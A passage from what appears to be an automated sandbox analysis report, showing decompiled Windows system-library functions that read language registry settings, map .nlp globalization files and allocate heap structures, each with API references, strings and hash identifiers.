											_t74 = 0xffffffffc0000017;
										}
									}
								}
							}
						} else {
							L4:
							_t74 = 0;
							 *_t73 = 1;
						}
					}
				}
				if(_v8 != 0) {
					_push(_v8);
					E6B2195D0();
				}
				if(_t63 != 0) {
					RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t63);
				}
				return _t74;
			}


















                                                                                                                            0x6b28e0f1
                                                                                                                            0x6b28e0f7
                                                                                                                            0x6b28e0fd
                                                                                                                            0x6b28e0ff
                                                                                                                            0x6b28e102
                                                                                                                            0x6b28e10c
                                                                                                                            0x6b28e21e
                                                                                                                            0x6b28e21e
                                                                                                                            0x6b28e112
                                                                                                                            0x6b28e112
                                                                                                                            0x6b28e117
                                                                                                                            0x00000000
                                                                                                                            0x6b28e126
                                                                                                                            0x6b28e12f
                                                                                                                            0x6b28e137
                                                                                                                            0x6b28e13e
                                                                                                                            0x6b28e146
                                                                                                                            0x6b28e149
                                                                                                                            0x6b28e14a
                                                                                                                            0x6b28e152
                                                                                                                            0x6b28e155
                                                                                                                            0x6b28e156
                                                                                                                            0x6b28e15d
                                                                                                                            0x6b28e160
                                                                                                                            0x6b28e16a
                                                                                                                            0x6b28e17f
                                                                                                                            0x6b28e184
                                                                                                                            0x6b28e19a
                                                                                                                            0x6b28e19c
                                                                                                                            0x6b28e1a3
                                                                                                                            0x00000000
                                                                                                                            0x6b28e1a5
                                                                                                                            0x6b28e1a5
                                                                                                                            0x6b28e1aa
                                                                                                                            0x00000000
                                                                                                                            0x6b28e1ac
                                                                                                                            0x6b28e1b2
                                                                                                                            0x6b28e1c8
                                                                                                                            0x6b28e1cc
                                                                                                                            0x6b28e1d3
                                                                                                                            0x6b28e1e8
                                                                                                                            0x6b28e1ec
                                                                                                                            0x6b28e1f2
                                                                                                                            0x6b28e212
                                                                                                                            0x6b28e21a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28e1f2
                                                                                                                            0x6b28e1ce
                                                                                                                            0x6b28e1ce
                                                                                                                            0x6b28e1ce
                                                                                                                            0x6b28e1cc
                                                                                                                            0x6b28e1b2
                                                                                                                            0x6b28e1aa
                                                                                                                            0x6b28e16c
                                                                                                                            0x6b28e16c
                                                                                                                            0x6b28e16c
                                                                                                                            0x6b28e16e
                                                                                                                            0x6b28e16e
                                                                                                                            0x6b28e16a
                                                                                                                            0x6b28e117
                                                                                                                            0x6b28e227
                                                                                                                            0x6b28e229
                                                                                                                            0x6b28e22c
                                                                                                                            0x6b28e22c
                                                                                                                            0x6b28e233
                                                                                                                            0x6b28e241
                                                                                                                            0x6b28e241
                                                                                                                            0x6b28e24e

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,00000000,?), ref: 6B28E12F
                                                                                                                            • ZwOpenKey.1105(00000000,00020019,00000018,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,00000000,?), ref: 6B28E163
                                                                                                                              • Part of subcall function 6B219600: LdrInitializeThunk.NTDLL(6B211119,?,?,00000018,?), ref: 6B21960A
                                                                                                                            • RtlInitUnicodeString.1105(?,PreferredUILanguages,00000000,00020019,00000018,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,00000000,?), ref: 6B28E17F
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,-00000002,00000007,00000000,00000000,?,?,PreferredUILanguages,00000000,00020019,00000018,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,00000000), ref: 6B28E1C3
                                                                                                                            • ZwClose.1105(00000000,?,00000000,?), ref: 6B28E22C
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,00000000,?), ref: 6B28E241
                                                                                                                            Strings
                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 6B28E126
                                                                                                                            • @, xrefs: 6B28E156
                                                                                                                            • PreferredUILanguages, xrefs: 6B28E176
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapInitStringUnicode$AllocateCloseFreeInitializeOpenThunk
                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                            • API String ID: 3331478053-2968386058
                                                                                                                            • Opcode ID: 547f2a5d00c872f87fdd48be9157514efa9118b32e1975fc5a5f67cfc5a69995
                                                                                                                            • Instruction ID: 7e235005b46d3ffe9faf9f8c1ad6152cfb974b8534174d5d70a07d89db380bae
                                                                                                                            • Opcode Fuzzy Hash: 547f2a5d00c872f87fdd48be9157514efa9118b32e1975fc5a5f67cfc5a69995
                                                                                                                            • Instruction Fuzzy Hash: F5413171D1020EBBDB11DBA4D8C1FDEB7F8AB08715F10416AE914A72D4D7789E49CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E76FE, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 116nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 62%
                                                                                                                            			E6B1E76FE(WCHAR* __ecx, unsigned int* __edx, short* _a4) {
				signed int _v12;
				char _v528;
				signed int _v532;
				intOrPtr _v536;
				WCHAR* _v540;
				char* _v544;
				void* _v548;
				signed int _v552;
				signed int _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				signed int _v568;
				char _v572;
				void* _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t39;
				long _t56;
				unsigned int _t58;
				unsigned int* _t60;
				intOrPtr _t66;
				short* _t68;
				long _t69;
				signed int _t70;

				_t67 = __edx;
				_v12 =  *0x6b2cd360 ^ _t70;
				_t60 = __edx;
				_v540 = __ecx;
				_t68 = _a4;
				if(__edx == 0 || __ecx == 0) {
					_t39 = 0xc000000d;
					goto L8;
				} else {
					_v532 = _v532 & 0x00000000;
					_v536 =  *((intOrPtr*)(__edx));
					RtlInitUnicodeString( &_v580, L"Latest");
					_v548 = 0x2000000;
					_v544 =  &_v528;
					_t69 = RtlAppendUnicodeToString( &_v548, L"\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages");
					if(_t69 < 0) {
						L6:
						if(_v532 != 0) {
							 *0x6b1b6cb8(_v532);
						}
						_t39 = _t69;
						L8:
						return E6B21B640(_t39, _t60, _v12 ^ _t70, _t67, _t68, _t69);
					}
					_t69 = RtlAppendUnicodeToString( &_v548, "\\");
					if(_t69 < 0) {
						goto L6;
					}
					_t69 = RtlAppendUnicodeToString( &_v548, _v540);
					if(_t69 < 0) {
						goto L6;
					}
					_v572 = 0x18;
					_v564 =  &_v548;
					_v532 = 0;
					_v568 = 0;
					_v560 = 0x40;
					_v556 = 0;
					_v552 = 0;
					_t69 =  *0x6b1b6cd8( &_v532, 0x20019,  &_v572);
					if(_t69 >= 0) {
						_t67 =  &_v580;
						_t56 = E6B2AF1B5(_v532,  &_v580,  &_v540, _t68, _t60);
						_t66 = _v536;
						_t69 = _t56;
						if(_t69 < 0) {
							L16:
							if(_t68 != 0 && _t66 >= 2) {
								 *_t68 = 0;
							}
							goto L6;
						}
						if(_v540 == 1) {
							_t58 =  *_t60;
							if(_t58 > _t66) {
								_t69 = 0xc0000023;
							} else {
								_t67 = 0;
								 *((short*)(_t68 + (_t58 >> 1) * 2 - 2)) = 0;
							}
							if(_t69 >= 0) {
								goto L6;
							} else {
								goto L16;
							}
						}
						_t69 = 0xc000015c;
						goto L16;
					}
					goto L6;
				}
			}




























                                                                                                                            0x6b1e76fe
                                                                                                                            0x6b1e7710
                                                                                                                            0x6b1e7715
                                                                                                                            0x6b1e7719
                                                                                                                            0x6b1e7720
                                                                                                                            0x6b1e7725
                                                                                                                            0x6b239609
                                                                                                                            0x00000000
                                                                                                                            0x6b1e7733
                                                                                                                            0x6b1e7735
                                                                                                                            0x6b1e773c
                                                                                                                            0x6b1e774e
                                                                                                                            0x6b1e775a
                                                                                                                            0x6b1e7764
                                                                                                                            0x6b1e777b
                                                                                                                            0x6b1e777f
                                                                                                                            0x6b1e7811
                                                                                                                            0x6b1e7818
                                                                                                                            0x6b2395fe
                                                                                                                            0x6b2395fe
                                                                                                                            0x6b1e781e
                                                                                                                            0x6b1e7820
                                                                                                                            0x6b1e7830
                                                                                                                            0x6b1e7830
                                                                                                                            0x6b1e7796
                                                                                                                            0x6b1e779a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1e77ae
                                                                                                                            0x6b1e77b2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1e77ba
                                                                                                                            0x6b1e77c4
                                                                                                                            0x6b1e77d2
                                                                                                                            0x6b1e77e4
                                                                                                                            0x6b1e77eb
                                                                                                                            0x6b1e77f5
                                                                                                                            0x6b1e77fb
                                                                                                                            0x6b1e7807
                                                                                                                            0x6b1e780b
                                                                                                                            0x6b239598
                                                                                                                            0x6b23959e
                                                                                                                            0x6b2395a3
                                                                                                                            0x6b2395a9
                                                                                                                            0x6b2395ad
                                                                                                                            0x6b2395dd
                                                                                                                            0x6b2395df
                                                                                                                            0x6b2395f0
                                                                                                                            0x6b2395f0
                                                                                                                            0x00000000
                                                                                                                            0x6b2395df
                                                                                                                            0x6b2395b6
                                                                                                                            0x6b2395bf
                                                                                                                            0x6b2395c3
                                                                                                                            0x6b2395d0
                                                                                                                            0x6b2395c5
                                                                                                                            0x6b2395c7
                                                                                                                            0x6b2395c9
                                                                                                                            0x6b2395c9
                                                                                                                            0x6b2395d7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2395d7
                                                                                                                            0x6b2395b8
                                                                                                                            0x00000000
                                                                                                                            0x6b2395b8
                                                                                                                            0x00000000
                                                                                                                            0x6b1e780b

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,Latest,00000000,02BDFFFE,?), ref: 6B1E774E
                                                                                                                            • RtlAppendUnicodeToString.1105(02000000,\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages), ref: 6B1E7776
                                                                                                                              • Part of subcall function 6B1EA990: memmove.1105(00000000,00000050,00000052,?,?,00000000,?,?,6B1EA448,?,\REGISTRY\USER\,?,02000000,?,?,000000FA), ref: 6B1EA9E2
                                                                                                                            • RtlAppendUnicodeToString.1105(02000000,6B1B5000,02000000,\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages), ref: 6B1E7791
                                                                                                                            • RtlAppendUnicodeToString.1105(02000000,?,02000000,6B1B5000,02000000,\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages), ref: 6B1E77A9
                                                                                                                            • ZwOpenKey.1105(00000000,00020019,00000018,02000000,?,02000000,6B1B5000,02000000,\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages), ref: 6B1E7801
                                                                                                                            Strings
                                                                                                                            • Latest, xrefs: 6B1E7748
                                                                                                                            • @, xrefs: 6B1E77EB
                                                                                                                            • \Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages, xrefs: 6B1E7770
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUnicode$Append$InitOpenmemmove
                                                                                                                            • String ID: @$Latest$\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages
                                                                                                                            • API String ID: 1239783430-1383699509
                                                                                                                            • Opcode ID: e09cf8019360c23d6f028cc6476fbf53767579c30781c0b9fe08adc4cfaee0ff
                                                                                                                            • Instruction ID: 1a4bd85f79fa76f85b9fd7335fb337e818d8230bb27f3793f709b0c4a952ba65
                                                                                                                            • Opcode Fuzzy Hash: e09cf8019360c23d6f028cc6476fbf53767579c30781c0b9fe08adc4cfaee0ff
                                                                                                                            • Instruction Fuzzy Hash: 71416E71D4162DABDB21CF68DCD8BDAB7F4AB15710F0105EAD809A7201DB789E85CFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B286369, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 113nativefileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 46%
                                                                                                                            			E6B286369(char* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr* _a4) {
				signed int _v12;
				short _v536;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v556;
				char _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				char _v584;
				void* _v592;
				char _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t33;
				char* _t50;
				intOrPtr* _t52;
				intOrPtr* _t63;
				signed int _t65;

				_v12 =  *0x6b2cd360 ^ _t65;
				_t52 = _a4;
				_t63 = __edx;
				_t64 = __ecx;
				_t62 = 0x100;
				if(E6B26CD55( &_v536, 0x100, L"\\SystemRoot\\Globalization\\") < 0) {
					L11:
					_t33 = 0xc0000001;
					L12:
					return E6B21B640(_t33, _t52, _v12 ^ _t65, _t62, _t63, _t64);
				}
				_t64 = 0x100;
				_t62 = 0x100;
				if(E6B2783B1( &_v536, 0x100, __ecx) < 0) {
					goto L11;
				}
				_t62 = 0x100;
				if(E6B2783B1( &_v536, 0x100, L".nlp") < 0) {
					goto L11;
				}
				RtlInitUnicodeString( &_v592,  &_v536);
				_v584 = 0x18;
				_push(0);
				_v580 = 0;
				_v576 =  &_v592;
				_push(1);
				_push( &_v600);
				_v572 = 0x40;
				_push( &_v584);
				_push(0x80100000);
				_v568 = 0;
				_push( &_v540);
				_v564 = 0;
				_t64 = E6B219830();
				if(_t64 >= 0) {
					_t62 =  &_v560;
					if(E6B2860A2(_v540,  &_v560) < 0 || _v556 != 0) {
						_t64 = 0xc0000001;
					} else {
						_push(_v540);
						_push(0x8000000);
						_push(2);
						 *_t52 = _v560;
						_t52 = 0;
						_push(0);
						_push(0);
						_push(0xf0005);
						_push( &_v544);
						_t64 = E6B2199A0();
						if(_t64 >= 0) {
							_push(2);
							_push(0);
							_push(1);
							 *_t63 = 0;
							_push( &_v548);
							_push(0);
							_push(0);
							_push(0);
							_push(_t63);
							_push(0xffffffff);
							_push(_v544);
							_v548 = 0;
							_t50 = E6B219780();
							_push(_v544);
							_t64 = _t50;
							E6B2195D0();
						}
					}
					_push(_v540);
					E6B2195D0();
				}
				_t33 = _t64;
				goto L12;
			}


























                                                                                                                            0x6b28637b
                                                                                                                            0x6b28637f
                                                                                                                            0x6b286384
                                                                                                                            0x6b286386
                                                                                                                            0x6b28638d
                                                                                                                            0x6b28639f
                                                                                                                            0x6b2864e3
                                                                                                                            0x6b2864e3
                                                                                                                            0x6b2864e8
                                                                                                                            0x6b2864f8
                                                                                                                            0x6b2864f8
                                                                                                                            0x6b2863a6
                                                                                                                            0x6b2863b1
                                                                                                                            0x6b2863ba
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2863c5
                                                                                                                            0x6b2863d4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2863e8
                                                                                                                            0x6b2863ef
                                                                                                                            0x6b2863f9
                                                                                                                            0x6b286400
                                                                                                                            0x6b286406
                                                                                                                            0x6b286412
                                                                                                                            0x6b286414
                                                                                                                            0x6b28641b
                                                                                                                            0x6b286425
                                                                                                                            0x6b286426
                                                                                                                            0x6b286431
                                                                                                                            0x6b286437
                                                                                                                            0x6b286438
                                                                                                                            0x6b286443
                                                                                                                            0x6b286447
                                                                                                                            0x6b286453
                                                                                                                            0x6b286460
                                                                                                                            0x6b2864cf
                                                                                                                            0x6b28646b
                                                                                                                            0x6b28646b
                                                                                                                            0x6b286477
                                                                                                                            0x6b28647c
                                                                                                                            0x6b28647e
                                                                                                                            0x6b286480
                                                                                                                            0x6b286482
                                                                                                                            0x6b286483
                                                                                                                            0x6b286484
                                                                                                                            0x6b28648f
                                                                                                                            0x6b286495
                                                                                                                            0x6b286499
                                                                                                                            0x6b28649b
                                                                                                                            0x6b28649d
                                                                                                                            0x6b28649e
                                                                                                                            0x6b2864a6
                                                                                                                            0x6b2864a8
                                                                                                                            0x6b2864a9
                                                                                                                            0x6b2864aa
                                                                                                                            0x6b2864ab
                                                                                                                            0x6b2864ac
                                                                                                                            0x6b2864ad
                                                                                                                            0x6b2864af
                                                                                                                            0x6b2864b5
                                                                                                                            0x6b2864bb
                                                                                                                            0x6b2864c0
                                                                                                                            0x6b2864c6
                                                                                                                            0x6b2864c8
                                                                                                                            0x6b2864c8
                                                                                                                            0x6b286499
                                                                                                                            0x6b2864d4
                                                                                                                            0x6b2864da
                                                                                                                            0x6b2864da
                                                                                                                            0x6b2864df
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,?,.nlp,?,\SystemRoot\Globalization\,?,00000000,?), ref: 6B2863E8
                                                                                                                            • ZwOpenFile.1105(?,80100000,00000018,?,00000001,00000000,?,?,.nlp,?,\SystemRoot\Globalization\,?,00000000,?), ref: 6B28643E
                                                                                                                              • Part of subcall function 6B2860A2: ZwQueryInformationFile.1105(?,00000001,?,00000018,00000005,00000000,?,00000001,00000000,?,?,.nlp,?,\SystemRoot\Globalization\,?,00000000), ref: 6B2860C4
                                                                                                                            • ZwCreateSection.1105(?,000F0005,00000000,00000000,00000002,08000000,?,?,80100000,00000018,?,00000001,00000000,?,?,.nlp), ref: 6B286490
                                                                                                                              • Part of subcall function 6B2199A0: LdrInitializeThunk.NTDLL(6B261A59,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6B2199AA
                                                                                                                            • ZwMapViewOfSection.1105(?,000000FF,00000000,00000000,00000000,00000000,?,00000001,00000000,00000002,?,000F0005,00000000,00000000,00000002,08000000), ref: 6B2864BB
                                                                                                                              • Part of subcall function 6B219780: LdrInitializeThunk.NTDLL(6B261A79,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004), ref: 6B21978A
                                                                                                                            • ZwClose.1105(?,?,000000FF,00000000,00000000,00000000,00000000,?,00000001,00000000,00000002,?,000F0005,00000000,00000000,00000002), ref: 6B2864C8
                                                                                                                            • ZwClose.1105(?,?,80100000,00000018,?,00000001,00000000,?,?,.nlp,?,\SystemRoot\Globalization\,?,00000000,?), ref: 6B2864DA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFileInitializeSectionThunk$CreateInformationInitOpenQueryStringUnicodeView
                                                                                                                            • String ID: .nlp$@$\SystemRoot\Globalization\
                                                                                                                            • API String ID: 4284092774-2934557456
                                                                                                                            • Opcode ID: 53609bc3fc8559b618d0806fdadaba9bc3136464f033d938dfca8e5a8b1857ee
                                                                                                                            • Instruction ID: ab4c9cac6b39d10cb1c66e403b89bcd71b55095af20b91a15ba47428933132cb
                                                                                                                            • Opcode Fuzzy Hash: 53609bc3fc8559b618d0806fdadaba9bc3136464f033d938dfca8e5a8b1857ee
                                                                                                                            • Instruction Fuzzy Hash: 8C413E7195122D6BDB31DE64CCC9BDEB7F8EB54354F1041E6A908A7280DB789E848FA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2037EB, Relevance: 15.3, APIs: 10, Instructions: 269memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E6B2037EB(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t98;
				intOrPtr _t102;
				char* _t113;
				signed short _t123;
				signed int _t124;
				signed int _t129;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t139;
				intOrPtr* _t141;
				long _t152;
				void* _t153;
				signed int _t154;
				signed int _t155;
				signed int _t157;
				signed int _t160;
				signed short _t163;
				signed short _t164;
				signed int _t173;
				intOrPtr* _t176;
				short _t178;
				intOrPtr _t179;
				intOrPtr* _t181;
				intOrPtr _t182;
				void* _t183;

				_push(0x50);
				_push(0x6b2aff48);
				E6B22D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t183 - 0x44)) = __ecx;
				 *((intOrPtr*)(_t183 - 0x1c)) = 0xc0000001;
				 *((intOrPtr*)(_t183 - 0x24)) = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *(_t183 - 0x2c) = __edx & 0x00000001;
				_t98 =  *[fs:0x30];
				RtlImageNtHeader( *(_t98 + 8));
				if(_t98 == 0) {
					_t178 = 0xc000007b;
					L28:
					return E6B22D0D1(_t178);
				}
				 *((intOrPtr*)(_t183 - 0x38)) =  *((intOrPtr*)(_t98 + 0x60));
				_t179 =  *((intOrPtr*)(_t98 + 0x64));
				 *((intOrPtr*)(_t183 - 0x30)) = _t179;
				_t102 =  *((intOrPtr*)( *[fs:0x30] + 0x208));
				if(_t102 != 0) {
					if(_t179 < _t102) {
						 *((intOrPtr*)(_t183 - 0x30)) = _t102;
					}
				}
				_t181 = RtlAllocateHeap( *( *[fs:0x30] + 0x18),  *0x6b2c84c4 + 0x000c0000 | 0x00000008, 0x120);
				 *((intOrPtr*)(_t183 - 0x20)) = _t181;
				 *((intOrPtr*)(_t183 - 4)) = 0;
				 *((intOrPtr*)(_t183 - 0x40)) = 1;
				if(_t181 == 0) {
					L36:
					_t178 = 0xc0000017;
					 *((intOrPtr*)(_t183 - 0x1c)) = 0xc0000017;
					goto L24;
				} else {
					_t152 =  *0x6b2c84c4 + 0xc0000;
					 *(_t183 - 0x48) = _t152;
					_t153 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), _t152,  *0x6b2c84c0 * 0x24);
					 *((intOrPtr*)(_t183 - 0x24)) = _t153;
					if(_t153 == 0) {
						_t178 = 0xc0000017;
						 *((intOrPtr*)(_t183 - 0x1c)) = 0xc0000017;
						_t181 =  *((intOrPtr*)(_t183 - 0x20));
						L24:
						 *((intOrPtr*)(_t183 - 4)) = 0xfffffffe;
						 *((intOrPtr*)(_t183 - 0x40)) = 0;
						E6B203B5A(_t107, 0, _t178, _t181);
						if(_t178 < 0) {
							goto L28;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t183 - 0x44)))) = _t181;
						if(E6B1F7D50() != 0) {
							_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							_t178 =  *((intOrPtr*)(_t183 - 0x1c));
							_t181 =  *((intOrPtr*)(_t183 - 0x20));
						} else {
							_t113 = 0x7ffe0386;
						}
						if( *_t113 != 0) {
							L32:
							E6B2A8BB6(_t181);
						}
						goto L28;
					}
					_t154 = 0;
					 *(_t183 - 0x28) = 0;
					_t182 =  *((intOrPtr*)(_t183 - 0x20));
					_t173 =  *0x6b2c84c0;
					while(_t154 < 3) {
						 *((intOrPtr*)(_t182 + 0x10 + _t154 * 4)) = _t173 * _t154 * 0xc +  *((intOrPtr*)(_t183 - 0x24));
						_t154 = _t154 + 1;
						 *(_t183 - 0x28) = _t154;
					}
					_t155 = 0;
					while(1) {
						 *(_t183 - 0x28) = _t155;
						if(_t155 >= _t173 * 3) {
							break;
						}
						_t141 = _t155 * 0xc +  *((intOrPtr*)(_t183 - 0x24));
						 *((intOrPtr*)(_t141 + 8)) = 0;
						 *((intOrPtr*)(_t141 + 4)) = _t141;
						 *_t141 = _t141;
						_t155 = _t155 + 1;
					}
					_t157 =  *0x6b2c84c4 + 0xc0000;
					 *(_t183 - 0x4c) = _t157;
					_t107 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), _t157 | 0x00000008, _t173 << 2);
					_t181 =  *((intOrPtr*)(_t183 - 0x20));
					 *(_t181 + 0x1c) = _t107;
					if(_t107 == 0) {
						goto L36;
					}
					_t160 =  *0x6b2c84c4 + 0xc0000;
					 *(_t183 - 0x50) = _t160;
					_t107 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), _t160 | 0x00000008,  *0x6b2c84c0 * 0xc);
					_t181 =  *((intOrPtr*)(_t183 - 0x20));
					 *(_t181 + 0x20) = _t107;
					if(_t107 == 0) {
						goto L36;
					}
					_t123 =  *0x7ffe03c0;
					 *(_t183 - 0x34) = _t123;
					 *(_t183 - 0x54) = _t123;
					 *(_t181 + 0x100) = _t123;
					_t178 = E6B203B7A(_t181);
					 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
					if(_t178 < 0) {
						goto L24;
					}
					 *((intOrPtr*)(_t181 + 0x104)) = 0xfffffffe;
					 *(_t183 - 0x60) = 0;
					 *((intOrPtr*)(_t183 - 0x5c)) = 0;
					_t163 =  *(_t183 - 0x34);
					_t124 = _t163 & 0x0000ffff;
					 *(_t183 - 0x60) = _t124;
					 *(_t181 + 8) = _t124;
					 *((intOrPtr*)(_t181 + 0xc)) = 0;
					 *_t181 = 1;
					if(_t163 < 4) {
						_t164 = 4;
					} else {
						_t164 = _t163 + 1;
					}
					 *(_t183 - 0x34) = _t164;
					_t49 = _t181 + 0x28; // 0x28
					_push(_t164);
					_push(0);
					_push(0x1f0003);
					_t178 = E6B219F70();
					 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
					if(_t178 < 0) {
						goto L24;
					} else {
						 *((intOrPtr*)(_t183 - 4)) = 1;
						 *((intOrPtr*)(_t183 - 0x3c)) = 1;
						_t129 =  *0x7ffe03c0 << 2;
						if(_t129 < 0x200) {
							_t129 = 0x200;
						}
						_t53 = _t181 + 0x24; // 0x24
						_push( *((intOrPtr*)(_t183 - 0x30)));
						_push( *((intOrPtr*)(_t183 - 0x38)));
						_push(_t129);
						_push(_t181);
						_push(0x6b1fc740);
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t181 + 0x28)));
						_push(0);
						_push(0xf00ff);
						_t178 = E6B21A160();
						 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
						if(_t178 < 0) {
							L23:
							 *((intOrPtr*)(_t183 - 4)) = 0;
							 *((intOrPtr*)(_t183 - 0x3c)) = 0;
							_t107 = E6B203B48(_t130, 0, _t178, _t181);
							goto L24;
						} else {
							if( *(_t183 - 0x2c) != 0) {
								_push(4);
								_push(_t183 - 0x2c);
								_push(0xd);
								_push( *((intOrPtr*)(_t181 + 0x24)));
								_t178 = E6B21AE70();
								 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
								if(_t178 < 0) {
									goto L23;
								}
								 *((short*)(_t181 + 0xe6)) =  *(_t183 - 0x2c);
							}
							 *((intOrPtr*)(_t181 + 0x2c)) = 0;
							 *((intOrPtr*)(_t181 + 0xe0)) = 0;
							 *((intOrPtr*)(_t181 + 0x110)) = 0;
							 *((short*)(_t181 + 0xe4)) = 0;
							_t63 = _t181 + 0x30; // 0x30
							_t133 = _t63;
							 *((intOrPtr*)(_t133 + 4)) = _t133;
							 *_t133 = _t133;
							_t65 = _t181 + 0x38; // 0x38
							_t134 = _t65;
							 *((intOrPtr*)(_t134 + 4)) = _t134;
							 *_t134 = _t134;
							_t67 = _t181 + 0x114; // 0x114
							_t135 = _t67;
							 *((intOrPtr*)(_t135 + 4)) = _t135;
							 *_t135 = _t135;
							E6B1FF194(_t181, _t183 - 0x58, 0);
							_t181 =  *((intOrPtr*)(_t183 - 0x20));
							 *((intOrPtr*)(_t181 + 0xf0)) =  *((intOrPtr*)(_t183 + 4));
							_t73 = _t181 + 0x40; // 0x40
							_t178 = E6B20196E(_t73, _t181);
							 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
							if(_t178 < 0) {
								goto L23;
							}
							_t178 = 0;
							 *((intOrPtr*)(_t183 - 0x1c)) = 0;
							E6B1F2280(_t130, 0x6b2c86b4);
							 *((intOrPtr*)(_t183 - 4)) = 2;
							_t77 = _t181 + 0xe8; // 0xe8
							_t139 = _t77;
							_t176 =  *0x6b2c53dc; // 0x6b2c53d8
							if( *_t176 != 0x6b2c53d8) {
								_push(3);
								asm("int 0x29");
								goto L32;
							}
							 *_t139 = 0x6b2c53d8;
							 *((intOrPtr*)(_t139 + 4)) = _t176;
							 *_t176 = _t139;
